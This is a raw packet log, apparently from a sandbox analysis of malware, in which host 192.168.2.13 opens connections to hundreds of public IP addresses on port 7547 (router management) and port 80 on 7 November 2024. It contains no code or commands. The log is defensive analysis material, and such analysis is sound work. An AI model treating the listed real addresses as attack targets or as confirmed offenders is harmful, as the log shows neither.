                                          Nov 7, 2024 11:57:58.409243107 CET75473056180.146.84.150192.168.2.13
                                          Nov 7, 2024 11:57:58.409252882 CET30567547192.168.2.1392.95.34.14
                                          Nov 7, 2024 11:57:58.409257889 CET75473056200.61.61.123192.168.2.13
                                          Nov 7, 2024 11:57:58.409271955 CET75473056155.208.183.235192.168.2.13
                                          Nov 7, 2024 11:57:58.409274101 CET30567547192.168.2.13167.66.169.217
                                          Nov 7, 2024 11:57:58.409275055 CET30567547192.168.2.13180.146.84.150
                                          Nov 7, 2024 11:57:58.409277916 CET30567547192.168.2.13200.61.61.123
                                          Nov 7, 2024 11:57:58.409285069 CET75473056176.210.20.212192.168.2.13
                                          Nov 7, 2024 11:57:58.409286976 CET228880192.168.2.13206.127.23.171
                                          Nov 7, 2024 11:57:58.409305096 CET30567547192.168.2.13155.208.183.235
                                          Nov 7, 2024 11:57:58.409308910 CET75473056137.227.15.121192.168.2.13
                                          Nov 7, 2024 11:57:58.409318924 CET30567547192.168.2.13176.210.20.212
                                          Nov 7, 2024 11:57:58.409321070 CET7547305637.46.5.132192.168.2.13
                                          Nov 7, 2024 11:57:58.409321070 CET228880192.168.2.13206.108.18.26
                                          Nov 7, 2024 11:57:58.409333944 CET7547305648.31.106.105192.168.2.13
                                          Nov 7, 2024 11:57:58.409346104 CET75473056107.66.72.9192.168.2.13
                                          Nov 7, 2024 11:57:58.409348965 CET30567547192.168.2.13137.227.15.121
                                          Nov 7, 2024 11:57:58.409353971 CET30567547192.168.2.1337.46.5.132
                                          Nov 7, 2024 11:57:58.409357071 CET75473056180.119.25.113192.168.2.13
                                          Nov 7, 2024 11:57:58.409360886 CET30567547192.168.2.1348.31.106.105
                                          Nov 7, 2024 11:57:58.409372091 CET75473056180.188.4.110192.168.2.13
                                          Nov 7, 2024 11:57:58.409373999 CET30567547192.168.2.13107.66.72.9
                                          Nov 7, 2024 11:57:58.409388065 CET30567547192.168.2.13180.119.25.113
                                          Nov 7, 2024 11:57:58.409388065 CET75473056193.87.42.15192.168.2.13
                                          Nov 7, 2024 11:57:58.409400940 CET75473056197.30.143.24192.168.2.13
                                          Nov 7, 2024 11:57:58.409408092 CET30567547192.168.2.13180.188.4.110
                                          Nov 7, 2024 11:57:58.409414053 CET7547305697.38.217.139192.168.2.13
                                          Nov 7, 2024 11:57:58.409415007 CET30567547192.168.2.13193.87.42.15
                                          Nov 7, 2024 11:57:58.409426928 CET7547305625.92.37.11192.168.2.13
                                          Nov 7, 2024 11:57:58.409439087 CET75473056115.90.164.194192.168.2.13
                                          Nov 7, 2024 11:57:58.409446001 CET30567547192.168.2.1397.38.217.139
                                          Nov 7, 2024 11:57:58.409446955 CET30567547192.168.2.13197.30.143.24
                                          Nov 7, 2024 11:57:58.409511089 CET30567547192.168.2.13115.90.164.194
                                          Nov 7, 2024 11:57:58.409518003 CET30567547192.168.2.1325.92.37.11
                                          Nov 7, 2024 11:57:58.409663916 CET75473056181.28.125.226192.168.2.13
                                          Nov 7, 2024 11:57:58.409677982 CET7547305670.134.222.96192.168.2.13
                                          Nov 7, 2024 11:57:58.409689903 CET7547305686.27.172.113192.168.2.13
                                          Nov 7, 2024 11:57:58.409698009 CET30567547192.168.2.13181.28.125.226
                                          Nov 7, 2024 11:57:58.409704924 CET75473056137.253.168.235192.168.2.13
                                          Nov 7, 2024 11:57:58.409719944 CET7547305620.209.42.39192.168.2.13
                                          Nov 7, 2024 11:57:58.409722090 CET30567547192.168.2.1386.27.172.113
                                          Nov 7, 2024 11:57:58.409733057 CET7547305653.255.164.6192.168.2.13
                                          Nov 7, 2024 11:57:58.409737110 CET30567547192.168.2.13137.253.168.235
                                          Nov 7, 2024 11:57:58.409749985 CET30567547192.168.2.1320.209.42.39
                                          Nov 7, 2024 11:57:58.409759998 CET7547305647.90.56.188192.168.2.13
                                          Nov 7, 2024 11:57:58.409760952 CET30567547192.168.2.1353.255.164.6
                                          Nov 7, 2024 11:57:58.409775972 CET75473056176.91.206.182192.168.2.13
                                          Nov 7, 2024 11:57:58.409790039 CET7547305695.143.8.11192.168.2.13
                                          Nov 7, 2024 11:57:58.409802914 CET7547305614.130.134.24192.168.2.13
                                          Nov 7, 2024 11:57:58.409811020 CET30567547192.168.2.13176.91.206.182
                                          Nov 7, 2024 11:57:58.409816027 CET75473056151.130.255.217192.168.2.13
                                          Nov 7, 2024 11:57:58.409821033 CET30567547192.168.2.1347.90.56.188
                                          Nov 7, 2024 11:57:58.409821033 CET30567547192.168.2.1395.143.8.11
                                          Nov 7, 2024 11:57:58.409830093 CET75473056212.39.27.126192.168.2.13
                                          Nov 7, 2024 11:57:58.409833908 CET30567547192.168.2.1370.134.222.96
                                          Nov 7, 2024 11:57:58.409838915 CET30567547192.168.2.1314.130.134.24
                                          Nov 7, 2024 11:57:58.409845114 CET75473056209.32.183.236192.168.2.13
                                          Nov 7, 2024 11:57:58.409853935 CET30567547192.168.2.13151.130.255.217
                                          Nov 7, 2024 11:57:58.409857035 CET30567547192.168.2.13212.39.27.126
                                          Nov 7, 2024 11:57:58.409857988 CET7547305617.131.213.38192.168.2.13
                                          Nov 7, 2024 11:57:58.409873009 CET7547305662.172.116.37192.168.2.13
                                          Nov 7, 2024 11:57:58.409874916 CET30567547192.168.2.13209.32.183.236
                                          Nov 7, 2024 11:57:58.409885883 CET75473056114.167.115.79192.168.2.13
                                          Nov 7, 2024 11:57:58.409888983 CET30567547192.168.2.1317.131.213.38
                                          Nov 7, 2024 11:57:58.409898996 CET75473056139.213.4.19192.168.2.13
                                          Nov 7, 2024 11:57:58.409903049 CET30567547192.168.2.1362.172.116.37
                                          Nov 7, 2024 11:57:58.409913063 CET75473056172.207.52.80192.168.2.13
                                          Nov 7, 2024 11:57:58.409925938 CET75473056113.23.43.207192.168.2.13
                                          Nov 7, 2024 11:57:58.409930944 CET30567547192.168.2.13139.213.4.19
                                          Nov 7, 2024 11:57:58.409939051 CET30567547192.168.2.13114.167.115.79
                                          Nov 7, 2024 11:57:58.409939051 CET7547305693.113.190.198192.168.2.13
                                          Nov 7, 2024 11:57:58.409951925 CET75473056216.164.38.183192.168.2.13
                                          Nov 7, 2024 11:57:58.409953117 CET30567547192.168.2.13172.207.52.80
                                          Nov 7, 2024 11:57:58.409953117 CET30567547192.168.2.13113.23.43.207
                                          Nov 7, 2024 11:57:58.409970045 CET30567547192.168.2.1393.113.190.198
                                          Nov 7, 2024 11:57:58.410005093 CET30567547192.168.2.13216.164.38.183
                                          Nov 7, 2024 11:57:58.410016060 CET7547305665.81.134.201192.168.2.13
                                          Nov 7, 2024 11:57:58.410044909 CET30567547192.168.2.1365.81.134.201
                                          Nov 7, 2024 11:57:58.410181999 CET7547305670.30.232.4192.168.2.13
                                          Nov 7, 2024 11:57:58.410196066 CET75473056160.160.179.142192.168.2.13
                                          Nov 7, 2024 11:57:58.410207987 CET7547305694.87.113.102192.168.2.13
                                          Nov 7, 2024 11:57:58.410221100 CET75473056135.234.8.207192.168.2.13
                                          Nov 7, 2024 11:57:58.410233974 CET7547305688.64.7.89192.168.2.13
                                          Nov 7, 2024 11:57:58.410234928 CET30567547192.168.2.1370.30.232.4
                                          Nov 7, 2024 11:57:58.410234928 CET30567547192.168.2.1394.87.113.102
                                          Nov 7, 2024 11:57:58.410244942 CET75473056119.203.94.222192.168.2.13
                                          Nov 7, 2024 11:57:58.410252094 CET30567547192.168.2.13160.160.179.142
                                          Nov 7, 2024 11:57:58.410257101 CET75473056115.206.218.94192.168.2.13
                                          Nov 7, 2024 11:57:58.410258055 CET30567547192.168.2.13135.234.8.207
                                          Nov 7, 2024 11:57:58.410259962 CET30567547192.168.2.1388.64.7.89
                                          Nov 7, 2024 11:57:58.410269976 CET7547305634.116.230.201192.168.2.13
                                          Nov 7, 2024 11:57:58.410281897 CET7547305619.89.5.242192.168.2.13
                                          Nov 7, 2024 11:57:58.410295010 CET7547305618.139.104.158192.168.2.13
                                          Nov 7, 2024 11:57:58.410296917 CET30567547192.168.2.1334.116.230.201
                                          Nov 7, 2024 11:57:58.410304070 CET30567547192.168.2.13115.206.218.94
                                          Nov 7, 2024 11:57:58.410306931 CET30567547192.168.2.13119.203.94.222
                                          Nov 7, 2024 11:57:58.410307884 CET75473056157.98.87.221192.168.2.13
                                          Nov 7, 2024 11:57:58.410326958 CET30567547192.168.2.1319.89.5.242
                                          Nov 7, 2024 11:57:58.410326958 CET30567547192.168.2.1318.139.104.158
                                          Nov 7, 2024 11:57:58.410342932 CET30567547192.168.2.13157.98.87.221
                                          Nov 7, 2024 11:57:58.410486937 CET802544112.14.180.55192.168.2.13
                                          Nov 7, 2024 11:57:58.410499096 CET802544112.208.231.53192.168.2.13
                                          Nov 7, 2024 11:57:58.410504103 CET3044880192.168.2.1337.245.183.55
                                          Nov 7, 2024 11:57:58.410520077 CET802544112.203.183.55192.168.2.13
                                          Nov 7, 2024 11:57:58.410528898 CET254480192.168.2.13112.14.180.55
                                          Nov 7, 2024 11:57:58.410531044 CET254480192.168.2.13112.208.231.53
                                          Nov 7, 2024 11:57:58.410533905 CET802544112.255.144.148192.168.2.13
                                          Nov 7, 2024 11:57:58.410547018 CET802544112.135.238.18192.168.2.13
                                          Nov 7, 2024 11:57:58.410559893 CET802544112.183.42.155192.168.2.13
                                          Nov 7, 2024 11:57:58.410563946 CET254480192.168.2.13112.203.183.55
                                          Nov 7, 2024 11:57:58.410563946 CET254480192.168.2.13112.255.144.148
                                          Nov 7, 2024 11:57:58.410567045 CET3044880192.168.2.1337.51.180.55
                                          Nov 7, 2024 11:57:58.410572052 CET802544112.149.224.89192.168.2.13
                                          Nov 7, 2024 11:57:58.410578966 CET254480192.168.2.13112.135.238.18
                                          Nov 7, 2024 11:57:58.410594940 CET802544112.180.140.37192.168.2.13
                                          Nov 7, 2024 11:57:58.410595894 CET254480192.168.2.13112.183.42.155
                                          Nov 7, 2024 11:57:58.410604954 CET254480192.168.2.13112.149.224.89
                                          Nov 7, 2024 11:57:58.410608053 CET802544112.179.235.236192.168.2.13
                                          Nov 7, 2024 11:57:58.410619974 CET802544112.124.158.203192.168.2.13
                                          Nov 7, 2024 11:57:58.410624027 CET254480192.168.2.13112.180.140.37
                                          Nov 7, 2024 11:57:58.410631895 CET802544112.147.37.12192.168.2.13
                                          Nov 7, 2024 11:57:58.410641909 CET254480192.168.2.13112.179.235.236
                                          Nov 7, 2024 11:57:58.410645008 CET802544112.113.35.50192.168.2.13
                                          Nov 7, 2024 11:57:58.410657883 CET802544112.185.126.152192.168.2.13
                                          Nov 7, 2024 11:57:58.410664082 CET254480192.168.2.13112.124.158.203
                                          Nov 7, 2024 11:57:58.410664082 CET254480192.168.2.13112.147.37.12
                                          Nov 7, 2024 11:57:58.410670996 CET802544112.77.169.188192.168.2.13
                                          Nov 7, 2024 11:57:58.410682917 CET802544112.79.177.115192.168.2.13
                                          Nov 7, 2024 11:57:58.410686016 CET3044880192.168.2.1337.27.83.139
                                          Nov 7, 2024 11:57:58.410696030 CET802544112.192.202.118192.168.2.13
                                          Nov 7, 2024 11:57:58.410696030 CET254480192.168.2.13112.185.126.152
                                          Nov 7, 2024 11:57:58.410696030 CET3044880192.168.2.1337.233.198.42
                                          Nov 7, 2024 11:57:58.410701990 CET254480192.168.2.13112.113.35.50
                                          Nov 7, 2024 11:57:58.410708904 CET3044880192.168.2.1337.188.50.13
                                          Nov 7, 2024 11:57:58.410710096 CET3044880192.168.2.1337.145.11.122
                                          Nov 7, 2024 11:57:58.410712957 CET254480192.168.2.13112.79.177.115
                                          Nov 7, 2024 11:57:58.410722017 CET254480192.168.2.13112.77.169.188
                                          Nov 7, 2024 11:57:58.410748005 CET3044880192.168.2.1337.97.26.177
                                          Nov 7, 2024 11:57:58.410751104 CET254480192.168.2.13112.192.202.118
                                          Nov 7, 2024 11:57:58.410768986 CET3044880192.168.2.1337.62.23.12
                                          Nov 7, 2024 11:57:58.410768986 CET3044880192.168.2.1337.237.138.204
                                          Nov 7, 2024 11:57:58.410774946 CET3044880192.168.2.1337.217.159.213
                                          Nov 7, 2024 11:57:58.410794973 CET3044880192.168.2.1337.9.187.56
                                          Nov 7, 2024 11:57:58.410794973 CET3044880192.168.2.1337.23.99.18
                                          Nov 7, 2024 11:57:58.410803080 CET3044880192.168.2.1337.27.149.77
                                          Nov 7, 2024 11:57:58.410809994 CET3044880192.168.2.1337.82.233.185
                                          Nov 7, 2024 11:57:58.410815954 CET3044880192.168.2.1337.3.120.205
                                          Nov 7, 2024 11:57:58.410831928 CET3044880192.168.2.1337.49.169.244
                                          Nov 7, 2024 11:57:58.410832882 CET3044880192.168.2.1337.96.190.124
                                          Nov 7, 2024 11:57:58.410845995 CET3044880192.168.2.1337.197.20.98
                                          Nov 7, 2024 11:57:58.410847902 CET3044880192.168.2.1337.219.62.41
                                          Nov 7, 2024 11:57:58.410867929 CET3044880192.168.2.1337.179.68.122
                                          Nov 7, 2024 11:57:58.410880089 CET3044880192.168.2.1337.52.208.19
                                          Nov 7, 2024 11:57:58.410881042 CET3044880192.168.2.1337.151.230.77
                                          Nov 7, 2024 11:57:58.410881042 CET3044880192.168.2.1337.113.2.79
                                          Nov 7, 2024 11:57:58.410890102 CET802544112.216.135.198192.168.2.13
                                          Nov 7, 2024 11:57:58.410898924 CET3044880192.168.2.1337.180.94.246
                                          Nov 7, 2024 11:57:58.410903931 CET802544112.38.216.166192.168.2.13
                                          Nov 7, 2024 11:57:58.410906076 CET3044880192.168.2.1337.4.116.154
                                          Nov 7, 2024 11:57:58.410917044 CET802544112.106.210.145192.168.2.13
                                          Nov 7, 2024 11:57:58.410926104 CET254480192.168.2.13112.216.135.198
                                          Nov 7, 2024 11:57:58.410932064 CET254480192.168.2.13112.38.216.166
                                          Nov 7, 2024 11:57:58.410938978 CET802544112.95.88.198192.168.2.13
                                          Nov 7, 2024 11:57:58.410945892 CET254480192.168.2.13112.106.210.145
                                          Nov 7, 2024 11:57:58.410948992 CET3044880192.168.2.1337.197.87.232
                                          Nov 7, 2024 11:57:58.410952091 CET802544112.136.233.176192.168.2.13
                                          Nov 7, 2024 11:57:58.410965919 CET802544112.1.56.147192.168.2.13
                                          Nov 7, 2024 11:57:58.410969973 CET3044880192.168.2.1337.238.183.50
                                          Nov 7, 2024 11:57:58.410969973 CET254480192.168.2.13112.95.88.198
                                          Nov 7, 2024 11:57:58.410974026 CET3044880192.168.2.1337.219.221.229
                                          Nov 7, 2024 11:57:58.410980940 CET254480192.168.2.13112.136.233.176
                                          Nov 7, 2024 11:57:58.410981894 CET802544112.173.241.180192.168.2.13
                                          Nov 7, 2024 11:57:58.410996914 CET802544112.192.102.150192.168.2.13
                                          Nov 7, 2024 11:57:58.410996914 CET3044880192.168.2.1337.152.228.152
                                          Nov 7, 2024 11:57:58.411001921 CET254480192.168.2.13112.1.56.147
                                          Nov 7, 2024 11:57:58.411001921 CET3044880192.168.2.1337.186.28.122
                                          Nov 7, 2024 11:57:58.411001921 CET3044880192.168.2.1337.141.51.172
                                          Nov 7, 2024 11:57:58.411006927 CET3044880192.168.2.1337.31.138.45
                                          Nov 7, 2024 11:57:58.411012888 CET254480192.168.2.13112.173.241.180
                                          Nov 7, 2024 11:57:58.411014080 CET802544112.46.98.249192.168.2.13
                                          Nov 7, 2024 11:57:58.411022902 CET3044880192.168.2.1337.106.49.122
                                          Nov 7, 2024 11:57:58.411027908 CET802544112.4.134.139192.168.2.13
                                          Nov 7, 2024 11:57:58.411031008 CET254480192.168.2.13112.192.102.150
                                          Nov 7, 2024 11:57:58.411046982 CET3044880192.168.2.1337.255.37.5
                                          Nov 7, 2024 11:57:58.411047935 CET3044880192.168.2.1337.28.226.37
                                          Nov 7, 2024 11:57:58.411048889 CET254480192.168.2.13112.46.98.249
                                          Nov 7, 2024 11:57:58.411051035 CET802544112.86.181.18192.168.2.13
                                          Nov 7, 2024 11:57:58.411063910 CET802544112.124.251.144192.168.2.13
                                          Nov 7, 2024 11:57:58.411067009 CET254480192.168.2.13112.4.134.139
                                          Nov 7, 2024 11:57:58.411076069 CET802544112.118.111.37192.168.2.13
                                          Nov 7, 2024 11:57:58.411079884 CET254480192.168.2.13112.86.181.18
                                          Nov 7, 2024 11:57:58.411087990 CET802544112.210.93.81192.168.2.13
                                          Nov 7, 2024 11:57:58.411092997 CET254480192.168.2.13112.124.251.144
                                          Nov 7, 2024 11:57:58.411098957 CET3044880192.168.2.1337.129.59.22
                                          Nov 7, 2024 11:57:58.411103010 CET802544112.141.204.252192.168.2.13
                                          Nov 7, 2024 11:57:58.411104918 CET254480192.168.2.13112.118.111.37
                                          Nov 7, 2024 11:57:58.411115885 CET802544112.91.144.181192.168.2.13
                                          Nov 7, 2024 11:57:58.411123037 CET254480192.168.2.13112.210.93.81
                                          Nov 7, 2024 11:57:58.411128998 CET802544112.138.190.145192.168.2.13
                                          Nov 7, 2024 11:57:58.411134005 CET254480192.168.2.13112.141.204.252
                                          Nov 7, 2024 11:57:58.411139011 CET3044880192.168.2.1337.182.85.118
                                          Nov 7, 2024 11:57:58.411142111 CET802544112.112.94.162192.168.2.13
                                          Nov 7, 2024 11:57:58.411149025 CET3044880192.168.2.1337.86.90.199
                                          Nov 7, 2024 11:57:58.411151886 CET3044880192.168.2.1337.102.83.98
                                          Nov 7, 2024 11:57:58.411154985 CET802544112.56.146.108192.168.2.13
                                          Nov 7, 2024 11:57:58.411164045 CET254480192.168.2.13112.91.144.181
                                          Nov 7, 2024 11:57:58.411164045 CET254480192.168.2.13112.138.190.145
                                          Nov 7, 2024 11:57:58.411166906 CET802544112.73.161.13192.168.2.13
                                          Nov 7, 2024 11:57:58.411176920 CET254480192.168.2.13112.112.94.162
                                          Nov 7, 2024 11:57:58.411180019 CET802544112.221.185.52192.168.2.13
                                          Nov 7, 2024 11:57:58.411190987 CET254480192.168.2.13112.56.146.108
                                          Nov 7, 2024 11:57:58.411192894 CET802544112.118.53.27192.168.2.13
                                          Nov 7, 2024 11:57:58.411196947 CET254480192.168.2.13112.73.161.13
                                          Nov 7, 2024 11:57:58.411206007 CET802544112.200.196.184192.168.2.13
                                          Nov 7, 2024 11:57:58.411206961 CET254480192.168.2.13112.221.185.52
                                          Nov 7, 2024 11:57:58.411218882 CET802544112.18.198.203192.168.2.13
                                          Nov 7, 2024 11:57:58.411232948 CET802544112.205.37.84192.168.2.13
                                          Nov 7, 2024 11:57:58.411237955 CET254480192.168.2.13112.118.53.27
                                          Nov 7, 2024 11:57:58.411238909 CET254480192.168.2.13112.200.196.184
                                          Nov 7, 2024 11:57:58.411245108 CET254480192.168.2.13112.18.198.203
                                          Nov 7, 2024 11:57:58.411247015 CET802544112.55.184.26192.168.2.13
                                          Nov 7, 2024 11:57:58.411261082 CET802544112.125.202.153192.168.2.13
                                          Nov 7, 2024 11:57:58.411267996 CET254480192.168.2.13112.205.37.84
                                          Nov 7, 2024 11:57:58.411273956 CET802544112.124.66.92192.168.2.13
                                          Nov 7, 2024 11:57:58.411287069 CET254480192.168.2.13112.125.202.153
                                          Nov 7, 2024 11:57:58.411318064 CET3044880192.168.2.1337.62.52.68
                                          Nov 7, 2024 11:57:58.411325932 CET254480192.168.2.13112.124.66.92
                                          Nov 7, 2024 11:57:58.411326885 CET3044880192.168.2.1337.133.7.74
                                          Nov 7, 2024 11:57:58.411330938 CET254480192.168.2.13112.55.184.26
                                          Nov 7, 2024 11:57:58.411374092 CET3044880192.168.2.1337.3.163.167
                                          Nov 7, 2024 11:57:58.411382914 CET3044880192.168.2.1337.149.200.170
                                          Nov 7, 2024 11:57:58.411391020 CET3044880192.168.2.1337.180.144.91
                                          Nov 7, 2024 11:57:58.411406994 CET3044880192.168.2.1337.95.122.217
                                          Nov 7, 2024 11:57:58.411442041 CET802544112.79.11.133192.168.2.13
                                          Nov 7, 2024 11:57:58.411443949 CET3044880192.168.2.1337.99.0.123
                                          Nov 7, 2024 11:57:58.411448002 CET3044880192.168.2.1337.210.12.255
                                          Nov 7, 2024 11:57:58.411454916 CET802544112.223.160.83192.168.2.13
                                          Nov 7, 2024 11:57:58.411465883 CET3044880192.168.2.1337.105.72.66
                                          Nov 7, 2024 11:57:58.411467075 CET802544112.128.111.115192.168.2.13
                                          Nov 7, 2024 11:57:58.411465883 CET3044880192.168.2.1337.121.218.32
                                          Nov 7, 2024 11:57:58.411478043 CET254480192.168.2.13112.79.11.133
                                          Nov 7, 2024 11:57:58.411487103 CET254480192.168.2.13112.223.160.83
                                          Nov 7, 2024 11:57:58.411490917 CET802544112.133.211.216192.168.2.13
                                          Nov 7, 2024 11:57:58.411504030 CET802544112.244.209.92192.168.2.13
                                          Nov 7, 2024 11:57:58.411508083 CET254480192.168.2.13112.128.111.115
                                          Nov 7, 2024 11:57:58.411516905 CET802544112.231.58.71192.168.2.13
                                          Nov 7, 2024 11:57:58.411529064 CET802544112.126.185.102192.168.2.13
                                          Nov 7, 2024 11:57:58.411530018 CET254480192.168.2.13112.133.211.216
                                          Nov 7, 2024 11:57:58.411533117 CET254480192.168.2.13112.244.209.92
                                          Nov 7, 2024 11:57:58.411542892 CET802544112.221.172.251192.168.2.13
                                          Nov 7, 2024 11:57:58.411545992 CET254480192.168.2.13112.231.58.71
                                          Nov 7, 2024 11:57:58.411556959 CET802544112.104.50.53192.168.2.13
                                          Nov 7, 2024 11:57:58.411561966 CET3044880192.168.2.1337.152.160.120
                                          Nov 7, 2024 11:57:58.411570072 CET254480192.168.2.13112.126.185.102
                                          Nov 7, 2024 11:57:58.411573887 CET254480192.168.2.13112.221.172.251
                                          Nov 7, 2024 11:57:58.411580086 CET802544112.207.183.144192.168.2.13
                                          Nov 7, 2024 11:57:58.411583900 CET254480192.168.2.13112.104.50.53
                                          Nov 7, 2024 11:57:58.411593914 CET802544112.128.227.225192.168.2.13
                                          Nov 7, 2024 11:57:58.411606073 CET802544112.126.71.197192.168.2.13
                                          Nov 7, 2024 11:57:58.411613941 CET254480192.168.2.13112.207.183.144
                                          Nov 7, 2024 11:57:58.411617994 CET802544112.183.150.240192.168.2.13
                                          Nov 7, 2024 11:57:58.411626101 CET802544112.190.104.131192.168.2.13
                                          Nov 7, 2024 11:57:58.411628962 CET254480192.168.2.13112.128.227.225
                                          Nov 7, 2024 11:57:58.411633015 CET802544112.32.201.239192.168.2.13
                                          Nov 7, 2024 11:57:58.411644936 CET3044880192.168.2.1337.117.25.245
                                          Nov 7, 2024 11:57:58.411648989 CET802544112.14.136.243192.168.2.13
                                          Nov 7, 2024 11:57:58.411655903 CET802544112.255.52.64192.168.2.13
                                          Nov 7, 2024 11:57:58.411662102 CET802544112.98.36.165192.168.2.13
                                          Nov 7, 2024 11:57:58.411664009 CET3044880192.168.2.1337.52.164.10
                                          Nov 7, 2024 11:57:58.411668062 CET802544112.1.253.92192.168.2.13
                                          Nov 7, 2024 11:57:58.411673069 CET3044880192.168.2.1337.241.204.187
                                          Nov 7, 2024 11:57:58.411674023 CET802544112.166.94.189192.168.2.13
                                          Nov 7, 2024 11:57:58.411678076 CET3044880192.168.2.1337.238.160.215
                                          Nov 7, 2024 11:57:58.411683083 CET3044880192.168.2.1337.57.84.228
                                          Nov 7, 2024 11:57:58.411686897 CET3044880192.168.2.1337.60.89.38
                                          Nov 7, 2024 11:57:58.411691904 CET802544112.18.181.203192.168.2.13
                                          Nov 7, 2024 11:57:58.411699057 CET802544112.82.188.185192.168.2.13
                                          Nov 7, 2024 11:57:58.411703110 CET254480192.168.2.13112.190.104.131
                                          Nov 7, 2024 11:57:58.411705971 CET802544112.79.228.189192.168.2.13
                                          Nov 7, 2024 11:57:58.411706924 CET254480192.168.2.13112.126.71.197
                                          Nov 7, 2024 11:57:58.411708117 CET254480192.168.2.13112.183.150.240
                                          Nov 7, 2024 11:57:58.411714077 CET254480192.168.2.13112.32.201.239
                                          Nov 7, 2024 11:57:58.411715984 CET254480192.168.2.13112.255.52.64
                                          Nov 7, 2024 11:57:58.411715984 CET254480192.168.2.13112.98.36.165
                                          Nov 7, 2024 11:57:58.411719084 CET802544112.173.1.102192.168.2.13
                                          Nov 7, 2024 11:57:58.411731005 CET254480192.168.2.13112.166.94.189
                                          Nov 7, 2024 11:57:58.411731958 CET254480192.168.2.13112.14.136.243
                                          Nov 7, 2024 11:57:58.411731005 CET254480192.168.2.13112.79.228.189
                                          Nov 7, 2024 11:57:58.411732912 CET254480192.168.2.13112.1.253.92
                                          Nov 7, 2024 11:57:58.411734104 CET802544112.184.243.4192.168.2.13
                                          Nov 7, 2024 11:57:58.411735058 CET254480192.168.2.13112.18.181.203
                                          Nov 7, 2024 11:57:58.411747932 CET802544112.52.123.175192.168.2.13
                                          Nov 7, 2024 11:57:58.411756039 CET254480192.168.2.13112.173.1.102
                                          Nov 7, 2024 11:57:58.411756039 CET254480192.168.2.13112.82.188.185
                                          Nov 7, 2024 11:57:58.411761045 CET802544112.223.218.12192.168.2.13
                                          Nov 7, 2024 11:57:58.411768913 CET254480192.168.2.13112.184.243.4
                                          Nov 7, 2024 11:57:58.411768913 CET254480192.168.2.13112.52.123.175
                                          Nov 7, 2024 11:57:58.411776066 CET802544112.139.22.222192.168.2.13
                                          Nov 7, 2024 11:57:58.411792040 CET254480192.168.2.13112.223.218.12
                                          Nov 7, 2024 11:57:58.411809921 CET254480192.168.2.13112.139.22.222
                                          Nov 7, 2024 11:57:58.411823034 CET3044880192.168.2.1337.128.106.90
                                          Nov 7, 2024 11:57:58.411827087 CET3044880192.168.2.1337.149.190.103
                                          Nov 7, 2024 11:57:58.411837101 CET3044880192.168.2.1337.172.89.247
                                          Nov 7, 2024 11:57:58.411886930 CET3044880192.168.2.1337.194.149.159
                                          Nov 7, 2024 11:57:58.411896944 CET3044880192.168.2.1337.246.62.11
                                          Nov 7, 2024 11:57:58.411900043 CET3044880192.168.2.1337.236.53.158
                                          Nov 7, 2024 11:57:58.411914110 CET3044880192.168.2.1337.94.180.177
                                          Nov 7, 2024 11:57:58.411915064 CET3044880192.168.2.1337.169.214.20
                                          Nov 7, 2024 11:57:58.411926031 CET3044880192.168.2.1337.169.147.10
                                          Nov 7, 2024 11:57:58.411927938 CET3044880192.168.2.1337.79.6.254
                                          Nov 7, 2024 11:57:58.411952019 CET3044880192.168.2.1337.220.200.103
                                          Nov 7, 2024 11:57:58.411962032 CET3044880192.168.2.1337.236.190.201
                                          Nov 7, 2024 11:57:58.411963940 CET3044880192.168.2.1337.107.13.11
                                          Nov 7, 2024 11:57:58.411967039 CET3044880192.168.2.1337.69.48.133
                                          Nov 7, 2024 11:57:58.411983013 CET3044880192.168.2.1337.201.22.74
                                          Nov 7, 2024 11:57:58.412003994 CET3044880192.168.2.1337.116.15.47
                                          Nov 7, 2024 11:57:58.412010908 CET3044880192.168.2.1337.225.230.194
                                          Nov 7, 2024 11:57:58.412030935 CET3044880192.168.2.1337.121.5.129
                                          Nov 7, 2024 11:57:58.412036896 CET3044880192.168.2.1337.245.51.38
                                          Nov 7, 2024 11:57:58.412038088 CET3044880192.168.2.1337.112.193.14
                                          Nov 7, 2024 11:57:58.412048101 CET3044880192.168.2.1337.99.117.50
                                          Nov 7, 2024 11:57:58.412051916 CET3044880192.168.2.1337.69.136.40
                                          Nov 7, 2024 11:57:58.412067890 CET3044880192.168.2.1337.45.20.12
                                          Nov 7, 2024 11:57:58.412080050 CET3044880192.168.2.1337.217.5.178
                                          Nov 7, 2024 11:57:58.412090063 CET3044880192.168.2.1337.47.238.153
                                          Nov 7, 2024 11:57:58.412097931 CET3044880192.168.2.1337.47.107.150
                                          Nov 7, 2024 11:57:58.412100077 CET3044880192.168.2.1337.82.224.190
                                          Nov 7, 2024 11:57:58.412106991 CET3044880192.168.2.1337.70.137.189
                                          Nov 7, 2024 11:57:58.412125111 CET3044880192.168.2.1337.252.181.188
                                          Nov 7, 2024 11:57:58.412130117 CET3044880192.168.2.1337.167.20.135
                                          Nov 7, 2024 11:57:58.412148952 CET3044880192.168.2.1337.146.151.98
                                          Nov 7, 2024 11:57:58.412148952 CET3044880192.168.2.1337.211.19.234
                                          Nov 7, 2024 11:57:58.412156105 CET3044880192.168.2.1337.37.205.202
                                          Nov 7, 2024 11:57:58.412179947 CET802544112.180.235.176192.168.2.13
                                          Nov 7, 2024 11:57:58.412189007 CET3044880192.168.2.1337.61.64.169
                                          Nov 7, 2024 11:57:58.412194014 CET802544112.50.14.191192.168.2.13
                                          Nov 7, 2024 11:57:58.412198067 CET3044880192.168.2.1337.102.243.128
                                          Nov 7, 2024 11:57:58.412206888 CET802544112.76.111.166192.168.2.13
                                          Nov 7, 2024 11:57:58.412218094 CET3044880192.168.2.1337.193.153.42
                                          Nov 7, 2024 11:57:58.412219048 CET254480192.168.2.13112.180.235.176
                                          Nov 7, 2024 11:57:58.412224054 CET254480192.168.2.13112.50.14.191
                                          Nov 7, 2024 11:57:58.412229061 CET802544112.39.62.227192.168.2.13
                                          Nov 7, 2024 11:57:58.412242889 CET802544112.182.244.38192.168.2.13
                                          Nov 7, 2024 11:57:58.412245035 CET254480192.168.2.13112.76.111.166
                                          Nov 7, 2024 11:57:58.412256002 CET802544112.243.227.110192.168.2.13
                                          Nov 7, 2024 11:57:58.412267923 CET802544112.228.150.8192.168.2.13
                                          Nov 7, 2024 11:57:58.412276983 CET254480192.168.2.13112.182.244.38
                                          Nov 7, 2024 11:57:58.412281990 CET254480192.168.2.13112.243.227.110
                                          Nov 7, 2024 11:57:58.412292957 CET802544112.154.225.60192.168.2.13
                                          Nov 7, 2024 11:57:58.412293911 CET254480192.168.2.13112.39.62.227
                                          Nov 7, 2024 11:57:58.412293911 CET254480192.168.2.13112.228.150.8
                                          Nov 7, 2024 11:57:58.412306070 CET802544112.84.132.148192.168.2.13
